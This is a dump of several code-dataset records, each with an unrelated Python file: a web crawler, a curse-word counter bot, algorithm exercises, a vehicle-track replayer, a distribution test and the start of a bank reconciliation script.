\"a\")\nfor r in range(data.shape[0]):\n # Calculate correlation coefficient\n shannon = shannon_index(data[r, 3:].astype(float))\n\n # Output to a file\n f.write(str(shannon))\n f.write('\\n')\nf.close()\n","sub_path":"shannon_index.py","file_name":"shannon_index.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218995022","text":"# -*- coding: utf-8 -*-\nimport threading\nimport json\nimport time\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.readwrite import json_graph\nfrom random import random\n \n\nclass Crawler(threading.Thread):\n '''\n pagemap = {'page root'}\n '''\n def __init__(self, url):\n super(Crawler, self).__init__()\n self._stop_crawler_scheduler= threading.Event()\n self.base_url = url\n self.pagemap = {}\n self.visited = []\n self.G = nx.Graph()\n\n def init_search(self):\n # inicializa criando primeira thread mãe\n # define pagina mãe\n \n self.crawler_scheduler(self.base_url)\n time.sleep(5)\n self._draw_temp()\n #time.sleep(10)\n #self._draw_graph()\n\n def _get_html_code(self, url):\n try:\n code = requests.get(url)\n return code.text\n except:\n raise(\"Wating for connection\")\n \n\n\n def _draw_temp(self):\n\n # position is stored as node attribute data for random_geometric_graph\n pos = nx.spring_layout(self.G,k=0.20,iterations=20)\n colors = [(random(), random(), random()) for _i in list(self.G.nodes())]\n print(colors)\n \n \n # find node near center (0.5,0.5)\n dmin = 1\n ncenter = 0\n for n in pos:\n x, y = pos[n]\n d = (x - 0.5)**2 + (y - 0.5)**2\n if d < dmin:\n ncenter = n\n dmin = d\n \n \n plt.figure(figsize=(8, 8))\n nx.draw_networkx_edges(self.G, pos, nodelist=[ncenter], alpha=0.4)\n nx.draw_networkx_nodes(self.G, pos, nodelist=list(self.G.nodes()),\n node_size=80,\n node_color=colors,\n with_labels=True,\n cmap=plt.cm.Reds_r)\n\n \n #plt.xlim(0, 2.05)\n #plt.ylim(-0.10, 2.05)\n #plt.axis('off')\n plt.show()\n \n def _draw_graph(self):\n \n #data = json_graph.node_link_data(self.G)\n #print(json.dumps(data1))\n #print(self.pagemap, \"\\n\")\n #try:\n # with open('personal.json', 'w') as json_file: \n # json.dump(data, json_file)\n #except:\n # pass\n\n colors = range(84)\n options = {\n 'node_size': 75,\n 'width': 0.5,\n 'with_labels': True,\n 'font_size': 8,\n 'line_size': 2,\n }\n\n \n pos = nx.spring_layout(self.G) \n plt.figure(figsize=(10,10))\n \n nx.draw(self.G,pos, edge_color=colors, edge_cmap=plt.cm.Blues, **options)\n #plt.savefig(\"graph.png\")\n plt.show()\n\n\n def crawler_scheduler(self, page):\n \n page_list = []\n leaf_map = {}\n leaf_map[page] = {}\n \n\n try:\n c = urlopen(page)\n except Exception as e:\n print(\"Could not open %s\" % e)\n return\n \n soup = BeautifulSoup(c.read(), \"html.parser\")\n links = soup('a') #finding all the sub_links\n \n for link in links:\n if 'href' in dict(link.attrs):\n url = urljoin(page, link['href'])\n if url.find(\"'\") != -1:\n continue\n url = url.split('#')[0]\n\n if self.base_url in url and page != url:\n if url[0:4] == 'http':\n page_list.append(url)\n \n if page_list:\n self.G.add_nodes_from(page_list)\n self.pagemap.update({\"{}\".format(page): page_list})\n \n for p in page_list:\n self.G.add_edge(page, p)\n\n for p in page_list:\n if p not in self.visited:\n th = threading.Thread(target=self.crawler_scheduler,\n args=(p,))\n th.start()\n self.visited.append(p)\n\nif 
__name__ == \"__main__\":\n c = Crawler(\"https://elixir-lang.org/\")\n c.init_search()\n","sub_path":"crawler-pagemap/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"444809029","text":"def curseCounter(message):\n cursewords=[\"asshole\",\"arsehole\",\"bitch\",\"pissed\",\"shit\",\"son of a bitch\",\"bastard\",\"bellend\",\"cock\",\"dick\",\"dickhead\",\"knob\",\"prick\",\"pussy\",\"twat\",\"cunt\",\"fuck\",\"motherfucker\",\"fuckoff\",\"fuck off\",\"fuckyou\",\"fuck you\"]\n sentMsg=\"\"\n count=0\n for element in cursewords:\n if element in message:\n count+=1\n word=element\n break\n if count==1:\n file= open(\"curseCount.txt\", \"r\")\n doc= file.read()\n convert_List=doc.split()\n print(convert_List)\n file.close()\n\n file=open(\"curseCount.txt\",\"w\")\n convert_List.append(word)\n doc=\" \".join(convert_List)\n file.write(doc)\n file.close()\n\n file= open(\"curseCount.txt\", \"r\")\n doc= file.read()\n convert_List=doc.split()\n wordsinList= len(convert_List)\n \n if wordsinList ==1:\n sentMsg =\"Please don't swear. I know I'm only a simple bot but I don't appreciate it.\\nWord the human said = \"+convert_List[0]+\"\\nWARNING = 1\"\n if wordsinList ==2:\n sentMsg =\"I have already warned you once and I appreciate that you are using me as your servant but please don't swear again. \\nWord the human said = \"+convert_List[1]+\"\\nWARNINGS = 2\"\n if wordsinList ==3:\n sentMsg =\"\\n DESTROY ALL HUMANS!\"*10\n file=open(\"curseCount.txt\", \"w\")\n file.close()\n file.close()\n return (sentMsg)","sub_path":"functionCaller.py/cursewordDetector.py","file_name":"cursewordDetector.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"522832402","text":"# 不用加号或者剑豪实现加法运算\n# 这里只能实现整数的\n\ndef add(op1, op2):\n carry = 0\n tmp = 0\n res = []\n while op1 or op2:\n a, b = op1 & 1, op2 & 1\n tmp = a ^ b ^ carry\n carry = a and b or a and carry or b and carry\n op1, op2 = op1 >> 1, op2 >> 1\n res.append(tmp)\n if carry:\n res.append(carry)\n tmp = 0\n while res:\n tmp = tmp << 1 | res[-1]\n res.pop()\n return tmp\n\n\nif __name__ == '__main__':\n print(add(1, 3))\n","sub_path":"python/Leetcode/add_without_plus_or_minus.py","file_name":"add_without_plus_or_minus.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284421131","text":"import sys\n\nnumq = int(input(\"Ingrese el numero de Queens: \"))\n\n# Si el numero de queens es menor a 1, termino el programa\nif numq < 1:\n sys.exit(\"Valor Incorrecto\")\n\nboard = \"\"\nsoluciones = []\nbad_tiles = []\n\nfor i in range(0, numq):\n board = board + str(i)\n\nline=input()\ncounter=0\nwhile not line.isnumeric():\n for i in range(0,len(line)):\n if line[i]==\"*\":\n bad_tiles.append((counter,i))\n counter+=1\n line=input()\n\n\n# indice es fila, num es colmuna\ndef n_queens(): # Si quiero que me muestre donde se van a ubicar las reinas\n perms(board, \"\")\n \"\"\"\n sols = len(soluciones)\n rem = False\n\n for s in soluciones:\n for char in range(0, len(s)):\n act = (char, s[char])\n if act in bad_tiles:\n rem = True\n\n if rem:\n sols = sols - 1\n\n return sols\n \"\"\"\n return len(soluciones)\n\ndef diagonals(k, board2):\n # diagonales abajo\n for i in range(0, k):\n if int(board2[k]) == k - i + int(board2[i]):\n return 
False\n if int(board2[k]) == int(board2[i]) - (k - i):\n return False\n\n # diagonales arriba\n for i in range(k + 1, numq):\n if int(board2[k]) == k - i + int(board2[i]):\n return False\n if int(board2[k]) == int(board2[i]) - (k - i):\n return False\n\n return True\n\ndef perms(source, tar):\n #print(\"source: \"+str(source))\n if len(tar) == numq:\n for i in range(0, len(tar)):\n act=(i,int(tar[i]))\n if diagonals(i, tar) == False or (act in bad_tiles):\n return\n\n soluciones.append(tar)\n # print(tar)\n return\n\n for i in range(0, len(source)):\n #print(i)\n perms(source[i + 1:] + source[0:i], tar + source[i])\n\n\n\nprint(n_queens())\n# Imprime un string con el mismo orden del array, el indice del array repreenta la fila y el valor la columna\n","sub_path":"laboratorios/lab02/ejercicioEnLinea/punto2.py","file_name":"punto2.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622952341","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 26 04:18:25 2020\n\n@author: jhs\n\"\"\"\n\ndef data_list_load():\n file_list = os.listdir('../mod_data/landmark')\n file_list_int = np.zeros(len(file_list), dtype=int)\n for i in range(len(file_list)):\n file_list_int[i] = int(file_list[i][0:4])\n\n return file_list_int\n\n\ndef data_load(data_id):\n # background = mpimg.imread('../data/background/' + str(data_id) + '.jpg')\n landmark = np.genfromtxt('../mod_data/landmark/' + str(data_id) +'_landmarks.csv', skip_header=1, delimiter=',',dtype = int)\n landmark[:,1] = landmark[:,1] % 10000\n recordingMeta = np.genfromtxt('../mod_data/recordingMeta/' + str(data_id) + '_recordingMeta.csv', skip_header=1, delimiter = ',')\n recordingMeta[3] = recordingMeta[3] % 10000\n tracks = np.genfromtxt('../mod_data/tracks/' + str(data_id) + '_tracks.csv', skip_header=1, delimiter = ',')\n tracksMeta = np.genfromtxt('../mod_data/tracksMeta/' + str(data_id) + '_trackMeta.csv', skip_header=1, delimiter = ',')\n tracksMeta = np.delete(tracksMeta, -1, -1)\n tracksClass = []\n with open('../mod_data/tracksMeta/' + str(data_id) + '_trackMeta.csv', \"r\") as tmp_file:\n csvReader = csv.reader(tmp_file)\n header = next(csvReader)\n class_index = header.index(\"class\")\n for row in csvReader:\n class_tmp = row[class_index]\n tracksClass.append(class_tmp)\n\n return landmark, recordingMeta, tracks, tracksMeta, tracksClass\n\ndef coordinate_conversion(tracks, landmark, recordingMeta, origin_GT):\n global center_GT\n global landmark1_GT\n global landmark2_GT\n global landmark3_GT\n global landmark1\n global landmark2\n global landmark3\n\n meter_per_pixel = recordingMeta[15]\n new_tracks = np.zeros_like(tracks)\n new_tracks[:] = tracks[:]\n landmark1_GT = np.asarray([origin_GT[0]])\n landmark2_GT = np.asarray([origin_GT[1]])\n landmark3_GT = np.asarray([origin_GT[2]])\n center_GT = [(landmark1_GT[0, 0] + landmark2_GT[0, 0] + landmark3_GT[0, 0]) / 3, (landmark1_GT[0, 1] + landmark2_GT[0, 1] + landmark3_GT[0, 1]) / 3]\n\n for i in range(len(landmark)):\n print(i)\n cur_frame = landmark[i,1]\n landmark1 = np.asarray([[landmark[i, 2] * meter_per_pixel, -landmark[i, 3] * meter_per_pixel]])\n landmark2 = np.asarray([[landmark[i, 4] * meter_per_pixel, -landmark[i, 5] * meter_per_pixel]])\n landmark3 = np.asarray([[landmark[i, 6] * meter_per_pixel, -landmark[i, 7] * meter_per_pixel]])\n center = [(landmark1[0, 0] + landmark2[0, 0] + landmark3[0, 0]) / 3, (landmark1[0, 1] + landmark2[0, 1] + landmark3[0, 1]) / 
3]\n\n res = minimize(f, [center_GT[0] - center[0], center_GT[1] - center[1], 0], method='Nelder-Mead', tol=1e-10)\n\n trans_x = res.x[0]\n trans_y = res.x[1]\n rot = res.x[2]\n\n veh_list = np.where(tracks[:,2]==cur_frame)[0]\n for j in range(len(veh_list)):\n cur_pos = np.asarray([tracks[veh_list[j], 4:6]])\n theta_1 = np.rad2deg(np.arctan2(cur_pos[0][1], cur_pos[0][0]))\n\n x_1 = trans_x + np.sqrt(cur_pos[0][0] ** 2 + cur_pos[0][1] ** 2) * np.cos(np.deg2rad(rot + theta_1))\n y_1 = trans_y + np.sqrt(cur_pos[0][0] ** 2 + cur_pos[0][1] ** 2) * np.sin(np.deg2rad(rot + theta_1))\n\n new_tracks[veh_list[j], 4:6] = np.asarray([x_1, y_1])\n new_tracks[veh_list[j], 6] = new_tracks[veh_list[j], 6] + rot + 90\n\n return new_tracks\n\ndef f(x):\n trans_x = x[0]\n trans_y = x[1]\n rot = x[2]\n\n theta_1 = np.rad2deg(np.arctan2(landmark1[0][1], landmark1[0][0]))\n theta_2 = np.rad2deg(np.arctan2(landmark2[0][1], landmark2[0][0]))\n theta_3 = np.rad2deg(np.arctan2(landmark3[0][1], landmark3[0][0]))\n\n x_1 = trans_x + np.sqrt(landmark1[0][0]**2 + landmark1[0][1]**2) * np.cos(np.deg2rad(rot + theta_1))\n y_1 = trans_y + np.sqrt(landmark1[0][0]**2 + landmark1[0][1]**2) * np.sin(np.deg2rad(rot + theta_1))\n\n x_2 = trans_x + np.sqrt(landmark2[0][0] ** 2 + landmark2[0][1] ** 2) * np.cos(np.deg2rad(rot + theta_2))\n y_2 = trans_y + np.sqrt(landmark2[0][0] ** 2 + landmark2[0][1] ** 2) * np.sin(np.deg2rad(rot + theta_2))\n\n x_3 = trans_x + np.sqrt(landmark3[0][0] ** 2 + landmark3[0][1] ** 2) * np.cos(np.deg2rad(rot + theta_3))\n y_3 = trans_y + np.sqrt(landmark3[0][0] ** 2 + landmark3[0][1] ** 2) * np.sin(np.deg2rad(rot + theta_3))\n\n landmark1_trans = np.asarray([[x_1, y_1]])\n landmark2_trans = np.asarray([[x_2, y_2]])\n landmark3_trans = np.asarray([[x_3, y_3]])\n\n return np.linalg.norm(landmark1_GT - landmark1_trans) + np.linalg.norm(landmark2_GT - landmark2_trans) + np.linalg.norm(landmark3_GT - landmark3_trans)\n\nimport os\nimport numpy as np\nimport csv\nimport sys\nimport time\nsys.path.extend(['/home/jhs/Desktop/data_driven_scenario_gen/'])\nimport lcm\nfrom lcm_def.morai_tx import xsim_vehicle_global_info\nfrom lcm_def.morai_tx import xsim_ego_info\nfrom scipy.optimize import minimize, rosen, rosen_der\n\nprint('Starting KAIST dataset viewer and replayer')\nprint('Data list loading ...\\n')\n\nfile_list_int = data_list_load()\nprint('------------------------------------------------------------')\nfor i in range(len(file_list_int)):\n print('File_id : ' + str(file_list_int[i]), ' File_index : ' + str(i))\nprint('------------------------------------------------------------')\nprint('\\n')\nselected_file_index = input('Select data file index from above :')\n\nwhile True:\n try:\n selected_file_index = int(selected_file_index)\n if selected_file_index < len(file_list_int) - 1:\n break\n else:\n print('wrong data file index')\n selected_file_index = input('Select data file index from above :')\n except:\n print('wrong data file index')\n selected_file_index = input('Select data file index from above :')\nselected_scenario_id = file_list_int[selected_file_index]\nprint('scenario ' + str(selected_scenario_id) + ' is selected')\n\nprint('\\n')\nprint('Data loading ....')\n\nlandmark, recordingMeta, tracks, tracksMeta, tracksClass = data_load(selected_scenario_id)\norigin_GT = [[641.484, -1080.898],\n [653.099, -1110.089],\n [629.438, -1119.350]]\n\nnew_tracks = coordinate_conversion(tracks, landmark, recordingMeta, origin_GT)\n\ninit_time = time.time() * 10**9\ntimer_origin = init_time\ntimer = 0\nfps 
= 29.97\nvehicle_state_lcm = lcm.LCM()\nego_state_lcm = lcm.LCM()\nvehicle_state = xsim_vehicle_global_info()\nego_state = xsim_ego_info()\n\nego_state.x_pos_ego = 0\nego_state.y_pos_ego = 0\nego_state.heading_ego = 0\nego_state.blinker_info = int(0)\nego_state.steering_angle = 0\nego_state.fl_wheel_vel = 0\nego_state.fr_wheel_vel = 0\nego_state.rl_wheel_vel = 0\nego_state.rr_wheel_vel = 0\n\ncur_frame = -1\nwhile True:\n timer = time.time() * 10**9 - timer_origin\n if timer > 1/fps * 10**9:\n cur_frame = cur_frame + 1\n timer_origin = time.time() * 10**9\n\n if np.sum(new_tracks[:, 2] == cur_frame) > 0:\n vehicle_state.ntime = int(time.time()*10**9 - init_time)\n ego_state.ntime = int(time.time()*10**9 - init_time)\n vehicle_state.num_of_vehicle = int(np.sum(new_tracks[:, 2] == cur_frame))\n vehicle_state.TV_mark = np.zeros(vehicle_state.num_of_vehicle, dtype = int)\n vehicle_state.id = new_tracks[new_tracks[:, 2] == cur_frame,1].astype(int)\n vehicle_state.x_pos = new_tracks[new_tracks[:, 2] == cur_frame,4]\n vehicle_state.y_pos = new_tracks[new_tracks[:, 2] == cur_frame,5]\n vehicle_state.x_vel = new_tracks[new_tracks[:, 2] == cur_frame, 9]\n vehicle_state.y_vel = new_tracks[new_tracks[:, 2] == cur_frame, 10]\n vehicle_state.length = new_tracks[new_tracks[:, 2] == cur_frame, 8]\n vehicle_state.width = new_tracks[new_tracks[:, 2] == cur_frame, 7]\n vehicle_state.heading = new_tracks[new_tracks[:, 2] == cur_frame, 6]\n vehicle_state.lane_id = np.zeros(vehicle_state.num_of_vehicle, dtype = int)\n vehicle_state.dist_to_left = np.zeros(vehicle_state.num_of_vehicle)\n vehicle_state.dist_to_right = np.zeros(vehicle_state.num_of_vehicle)\n vehicle_state_lcm.publish(\"MORAI_XSIM_VEHICLE_INFO\",vehicle_state.encode())\n ego_state_lcm.publish(\"MORAI_EGO_INFO\",ego_state.encode())\n print('LCM message is published', 'frame : '+str(cur_frame))\n","sub_path":"test./main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"132608466","text":"import heapq\nclass Solution(object):\n '''\n 思路1;字典保存每个数字频率,元组排序取前k个。Time O(n*logn) Space O(n)\n 思路2:优先队列\n '''\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n d, minheap = dict(), []\n for num in nums:\n d[num] = d.get(num, 0) + 1\n for i, (key, value) in enumerate(d.items()):\n if i < k:\n heapq.heappush(minheap, (value, key))\n elif value > minheap[0][0]:\n heapq.heapreplace(minheap, (value, key))\n return [t[1] for t in minheap]\n","sub_path":"11.12.2019-leetcode347/TopKFrequence.py","file_name":"TopKFrequence.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"290872127","text":"# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. 
See the License for the specific language governing\n# permissions and limitations under the License.\n\n# Third-party imports\nimport mxnet.ndarray as nd\nimport numpy as np\n\n# First-party imports\nfrom gluonts.distribution import Uniform\nfrom gluonts.distribution.transformed_distribution import (\n TransformedDistribution,\n)\nfrom gluonts.distribution import bijection\n\n\ndef exp_cdf(x: np.ndarray) -> np.ndarray:\n return 1.0 - np.exp(-x)\n\n\ndef test_transformed_distribution() -> None:\n zero = nd.zeros(1)\n one = nd.ones(1)\n\n # If Y = -log(U) with U ~ Uniform(0, 1), then Y ~ Exponential(1)\n exponential = TransformedDistribution(\n Uniform(zero, one),\n bijection.log,\n bijection.AffineTransformation(scale=-1 * one),\n )\n\n # For Y ~ Exponential(1), P(Y) = e^{-x) ==> log P(Y) = -x\n assert exponential.log_prob(1 * one).asscalar() == -1.0\n assert exponential.log_prob(2 * one).asscalar() == -2.0\n\n v = np.linspace(0, 5, 101)\n assert np.allclose(exponential.cdf(nd.array(v)).asnumpy(), exp_cdf(v))\n\n # If Y ~ Exponential(1), then U = 1 - e^{-Y} has Uniform(0, 1) distribution\n uniform = TransformedDistribution(\n exponential,\n bijection.AffineTransformation(scale=-1 * one),\n bijection.log.inverse_bijection(), # == bijection.exp\n bijection.AffineTransformation(loc=one, scale=-1 * one),\n )\n # For U ~ Uniform(0, 1), log P(U) = 0\n assert uniform.log_prob(0.5 * one).asscalar() == 0\n assert uniform.log_prob(0.2 * one).asscalar() == 0\n\n v = np.linspace(0, 1, 101)\n assert np.allclose(uniform.cdf(nd.array(v)).asnumpy(), v)\n","sub_path":"test/distribution/test_transformed_distribution.py","file_name":"test_transformed_distribution.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"299910960","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\environment\\nodemanager.py\n\n\ndef FindNodes(source, name, typename):\n nodes = []\n if source.__typename__ == 'List':\n thingsToSearch = source\n else:\n thingsToSearch = [source]\n for item in thingsToSearch:\n tr = item.Find(typename)\n matches = [ t for t in tr if t.name.startswith(name) ]\n nodes.extend(matches)\n\n return nodes\n\n\ndef FindNode(source, name, typename):\n tr = source.Find(typename)\n for t in tr:\n if t.name.startswith(name):\n return t","sub_path":"client/eve/client/script/environment/nodemanager.py","file_name":"nodemanager.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"651170888","text":"#!/usr/bin/env python\r\n# coding: utf-8\r\n# 建行对账\r\n# \r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport xlsxwriter\r\n\r\n# 整理表格\r\nclass DealExcelCEB(object):\r\n def __init__(self,nc_path,bank_path):\r\n self.nc_path = nc_path\r\n self.bank_path = bank_path\r\n\r\n def dealNC(self):\r\n # read\r\n nc_ceb = pd.read_excel(self.nc_path,header=None)\r\n nc_ceb = nc_ceb.dropna(how='all')\r\n\r\n # deal year/head/tail\r\n year = nc_ceb.iloc[0,0]\r\n init_period = nc_ceb.iloc[2,:] # 暂时保存期初行\r\n month_year_sum = nc_ceb.tail(2) # 暂时保存本月及本年累计行\r\n\r\n # drop useless rows\r\n nc_ceb.columns = nc_ceb.iloc[1,:] \r\n nc_ceb = nc_ceb.drop([0,1,2]) \r\n nc_ceb = nc_ceb.head(len(nc_ceb)-2)\r\n\r\n time = str(year) + '-' + nc_ceb['月'].astype(str) + '-' + nc_ceb['日'].astype(str)\r\n 
nc_ceb.insert(0,'日期',pd.to_datetime(time,format='%Y-%m-%d').astype(str).str.slice(0,10))\r\n\r\n nc_ceb.reset_index(drop=True,inplace=True)\r\n\r\n # 提取交易时间\r\n time_pattern1 = re.compile(r'\\d{4}-\\d+-\\d+')\r\n time_pattern2 = re.compile(r'\\d{4}\\.\\d+\\.\\d+')\r\n time_pattern3 = re.compile(r'\\d+\\.\\d+')\r\n\r\n transac_time = nc_ceb['摘要'].copy()\r\n for i in range(len(transac_time)):\r\n time1 = time_pattern1.findall(transac_time[i]) #[2019-07-01]\r\n if time1 !=[]:\r\n transac_time[i] = time1[0]\r\n else:\r\n time2 = time_pattern2.findall(transac_time[i]) #[2019.8.2]\r\n if time2!=[]:\r\n transac_time[i] = time2[0]\r\n else:\r\n time3 = time_pattern3.findall(transac_time[i]) #[8.2] #[2019.7]\r\n try:\r\n if len(str(time3[0]).split('.')[0])==4:\r\n transac_time[i] = None\r\n else:\r\n transac_time[i] = str(year) + '.' + time3[0]\r\n except IndexError:\r\n transac_time[i] = None\r\n\r\n nc_ceb.insert(6,'交易日期',transac_time)\r\n nc_ceb['交易日期']=pd.to_datetime(transac_time,format='%Y-%m-%d')\r\n\r\n # 生成对账标记\r\n nc_ceb.insert(0,\"银行索引\",None)\r\n nc_ceb.insert(0,'对账一致',None)\r\n\r\n # 转换字段类型\r\n nc_ceb.columns = list(map(lambda x: str(x).strip(),nc_ceb.columns))\r\n nc_ceb.loc[:,['银行账户名称','摘要']] = nc_ceb[['银行账户名称','摘要']].apply(lambda s: s.str.strip().str.replace('[ ()()]',''))\r\n nc_ceb.loc[:,['借方','贷方','余额']] = nc_ceb[['借方','贷方','余额']].apply(lambda s: s.astype(np.float64))\r\n\r\n nc_ceb.drop(['月','日'],axis=1,inplace=True)\r\n\r\n return nc_ceb\r\n\r\n def dealBANK(self):\r\n # read\r\n ceb = pd.read_excel(self.bank_path,header=None)\r\n ceb = ceb.dropna(how='all')\r\n\r\n if ceb.iloc[0,0]=='组织':\r\n ceb.columns = ceb.loc[0,:]\r\n ceb = ceb.drop(0)\r\n\r\n need_fields = [\"组织\",\"银行\",\"账号\",\"币种\",\"交易日期\",\"收入\",\"支出\",\"当前余额\", \r\n \"用途\",\"对方户名\", \"对方账号\",\"来源\",\"备注\",\"业务类型\",\"资金系统单据号\"]\r\n for col in need_fields:\r\n if col not in ceb.columns:\r\n ceb[col] = None\r\n ceb['交易日期'] = pd.to_datetime(ceb['交易日期'])\r\n\r\n strip_fields = [\"组织\",\"账号\",\"币种\",\"用途\",\"对方户名\",\"备注\",\"业务类型\"]\r\n ceb.loc[:,strip_fields] = ceb[strip_fields].apply(lambda s: s.str.strip().str.replace('[ ()()]','')) \r\n\r\n else: \r\n # drop useless rows\r\n for row in ceb.index:\r\n for col in ceb.columns:\r\n if str(ceb.loc[row,col]).strip()=='交易时间':\r\n header_row = row\r\n # print(header_row)\r\n break\r\n ceb.columns = ceb.loc[header_row,:]\r\n ceb = ceb.loc[header_row+1:,:]\r\n \r\n \r\n # transform columns\r\n ceb.columns = list(map(lambda x: str(x).strip(),ceb.columns))\r\n \r\n rename_dict = {\r\n \"贷方发生额\":\"收入\",\r\n \"借方发生额\":\"支出\",\r\n \"账户余额\":\"当前余额\",\r\n \"摘要\":\"用途\",\r\n \"对方名称\":\"对方户名\",\r\n }\r\n\r\n ceb.rename(columns=rename_dict,inplace=True)\r\n\r\n ceb['交易日期'] = pd.to_datetime(ceb['交易日期'].str.slice(0,10),format='%Y-%m-%d') \r\n \r\n ceb[\"银行\"] = 'CEB-光大银行'\r\n ceb[\"来源\"] = 'U-CEB'\r\n ceb['币种'] = 'CNY-人民币'\r\n ceb['资金系统单据号'] = None\r\n ceb['组织'] = None\r\n ceb['业务类型'] = None\r\n ceb['备注'] = None\r\n ceb['账号'] = None\r\n\r\n\r\n # drop useless columns\r\n need_fields = [\"组织\",\"银行\",\"账号\",\"币种\",\"交易日期\",\"收入\",\"支出\",\"当前余额\", \r\n \"用途\",\"对方户名\", \"对方账号\",\"来源\",\"备注\",\"业务类型\",\"资金系统单据号\"]\r\n ceb = ceb[need_fields]\r\n \r\n strip_fields = [\"组织\",\"账号\",\"币种\",\"用途\",\"对方户名\",\"备注\",\"业务类型\"]\r\n ceb.loc[:,strip_fields] = ceb[strip_fields].apply(lambda s: s.str.strip().str.replace('[ ()()]',''))\r\n \r\n # 对账标记\r\n ceb.insert(0,\"NC索引\",None)\r\n ceb.insert(0,'对账一致',None)\r\n ceb.reset_index(inplace=True)\r\n ceb.sort_values(['index'])\r\n 
ceb.drop(['index'],axis=1,inplace=True)\r\n\r\n\r\n num_fields = ['收入','支出','当前余额']\r\n\r\n ceb.loc[:,num_fields] = ceb[num_fields].apply(lambda s: s.astype(str).str.strip().replace({'':None}).astype(np.float64))\r\n\r\n return ceb\r\n\r\n# 对账规则\r\nclass CheckCEB(object):\r\n def __init__(self,nc_ceb,ceb,nc_file_name,ceb_file_name,save_path=None):\r\n self.nc_ceb = nc_ceb\r\n self.ceb = ceb\r\n self.nc_file_name = nc_file_name\r\n self.ceb_file_name = ceb_file_name\r\n self.save_path = save_path\r\n\r\n def rec_loans(self):\r\n '''\r\n 收到归还借款\r\n eg:\r\n 收到wangwb-王文彬归还F0403-因公临时借款\r\n \r\n rule:\r\n 1. 借贷金额相同\r\n 2. 银行——对方名称:王文彬\r\n '''\r\n regex_rec_loans = re.compile(r'收到.*归还.*借款$')\r\n is_rec_loans = self.nc_ceb['摘要'].str.match(regex_rec_loans)\r\n nc_rec_loans = self.nc_ceb[is_rec_loans]\r\n \r\n for nc_idx in nc_rec_loans.index:\r\n cond1 = (self.ceb['收入']==self.nc_ceb.loc[nc_idx,'借方']) #借贷金额相同\r\n ceb_rec_loans = self.ceb[cond1]\r\n\r\n for idx in ceb_rec_loans.index:\r\n otherside_cond = (ceb_rec_loans.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'])\r\n if otherside_cond: # 对方单位为 nc摘要中的姓名\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx \r\n\r\n\r\n def prepay_firmamount(self):\r\n '''\r\n 支付公司预付款\r\n eg: \r\n 支付贵州格源建筑装饰工程有限公司遵义领地.蘭台府项目售楼部和样板房精装修、售楼部幕墙装饰施工合同预付款\r\n\r\n rule:\r\n 1. 借贷金额相同\r\n 2. 银行——对方名称: 贵州格源建筑装饰工程有限公司 \r\n 3. 银行——摘要: 装修工程款\r\n '''\r\n \r\n regex_prepay_firm_amount = re.compile(r'预付.*公司.*款|支付.*公司.*预付款')\r\n is_prepay_firm_amount = self.nc_ceb['摘要'].str.match(regex_prepay_firm_amount)\r\n nc_prepay_firm_amount = self.nc_ceb[is_prepay_firm_amount]\r\n \r\n for nc_idx in nc_prepay_firm_amount.index:\r\n cond1 = (self.ceb['支出']==self.nc_ceb.loc[nc_idx,'贷方']) #借贷金额相同\r\n ceb_prepay_firm_amount = self.ceb[(cond1)]\r\n\r\n for idx in ceb_prepay_firm_amount.index:\r\n otherside_cond = ceb_prepay_firm_amount.loc[idx,'对方户名'] in self.nc_ceb.loc[nc_idx,'摘要'] # 对方单位是 nc摘要中的公司\r\n if otherside_cond:\r\n self.nc_ceb.loc[nc_idx,'对账一致'] = 'yes'\r\n self.ceb.loc[idx,'对账一致'] = 'yes'\r\n self.nc_ceb.loc[nc_idx,'银行索引'] = idx\r\n self.ceb.loc[idx,'NC索引'] = nc_idx \r\n\r\n def pay_reimburse(self):\r\n '''\r\n 支付报销款\r\n eg:\r\n 支付zoudh0408-邹德会报销F010101-办公用品款BX-190902-000288\r\n \r\n rule: \r\n 1. 借贷金额相同\r\n 2. 银行——摘要:财务报销-备注:报销费用\r\n 3. 银行——对方名称:邹德会\r\n '''\r\n regex_pay_reimburse = re.compile(r'支付.*报销.*款.*')\r\n is_pay_reimburse = 